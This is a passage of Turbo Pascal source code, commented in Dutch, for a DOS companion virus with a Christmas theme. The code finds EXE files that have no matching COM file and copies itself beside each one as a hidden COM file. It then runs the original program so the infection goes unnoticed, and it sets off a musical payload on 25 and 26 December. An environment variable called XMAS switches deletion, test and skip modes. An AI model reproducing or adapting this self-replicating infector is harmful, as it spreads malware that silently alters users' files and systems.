PlayOBJ(@Christmas, TRUE, StopChar);
Until StopChar<>#0;
End;
{Deze procedure zoekt een EXE file waarvan er geen COM is en stuurt het
resultaat in de boolean FileFound en de naam van het te maken COM bestand
in FileName}
Procedure FileSeek;
Label Seeker, FileSeekOk;
Begin;
FileFound:=False;
FindFirst('*.EXE',Anyfile,DirInfo);
Seeker:
If DosError=18 Then Exit;
FileName:= DirInfo.Name;
Delete(FileName,Length(FileName)-2,3);
Insert('COM',FileName,Length(FileName)+1);
FindFirst(FileName,AnyFile,ComSeek);
If DosError=18 Then Goto FileSeekOk;
FindNext(DirInfo);
Goto Seeker;
FileSeekOk:
FileFound:=True;
End;
Procedure CopyFile;
var
FromF, ToF: file;
NumRead, NumWritten: Word;
buf: array[1..512] of Char;
begin;
{ Open input file }
Assign(FromF, ParamStr(0));
{ Record size = 1 }
Reset(FromF, 1);
{ Open output file }
Assign(ToF, FileName);
{ Record size = 1 }
Rewrite(ToF, 1);
repeat
BlockRead(FromF,buf,
SizeOf(buf),NumRead);
BlockWrite(ToF,buf,NumRead,NumWritten);
until (NumRead = 0) or
(NumWritten <> NumRead);
Close(FromF);
Close(ToF);
Assign(ToF,FileName);
SetFAttr(ToF,Hidden);
end;
Begin; {Hoofdprocedure}
If (GetEnv('XMAS')='DEL') or (GetEnv('XMAS')='del') Then
Begin;
OrigName:=ParamStr(0);
ExtHere:=False;
P:=Pos('.COM',OrigName);
If P<>0 Then ExtHere:=True;
P:=Pos('.com',OrigName);
If P<>0 Then ExtHere:=True;
If ExtHere=False Then
OrigName:=OrigName+'.COM';
Assign(FromF, OrigName);
SetFAttr(FromF,Archive);
Erase(FromF);
Goto StartOrig;
End;
If (GetEnv('XMAS')='TST') or (GetEnv('XMAS')='tst') Then
Begin;
Active;
Goto StartOrig;
End;
If (GetEnv('XMAS')='YES') or (GetEnv('XMAS')='yes') Then Goto StartOrig;
{Datum bekijken of het 25 of 26 december is en indien juist Active aanroepen}
GetDate(Year, Month, Day, DayOfWeek);
If (Month=12) and ((Day=25) or (Day=26)) then Active;
{Procedure voor EXE file zoeken aanroepen}
FileSeek;
{Als er een kandidaat is gevonden, dit prg als COM erbij zetten}
If FileFound=False Then Goto StartOrig;
CopyFile;
StartOrig:
Parameters:='';
For Teller:= 1 to ParamCount Do Parameters:=Parameters+' '+ParamStr(Teller);
OrigName:=ParamStr(0);
ExtHere:=False;
P:=Pos('.COM',OrigName);
If P<>0 Then ExtHere:=True;
P:=Pos('.com',OrigName);
If P<>0 Then ExtHere:=True;
If ExtHere=False Then
OrigName:=OrigName+'.EXE';
If ExtHere=True Then
Begin;
Delete(OrigName,Length(OrigName)-3,4);
OrigName:=OrigName+'.EXE';
End;
SwapVectors;
Exec(OrigName,Parameters);
SwapVectors;
Halt(DosExitCode);
End.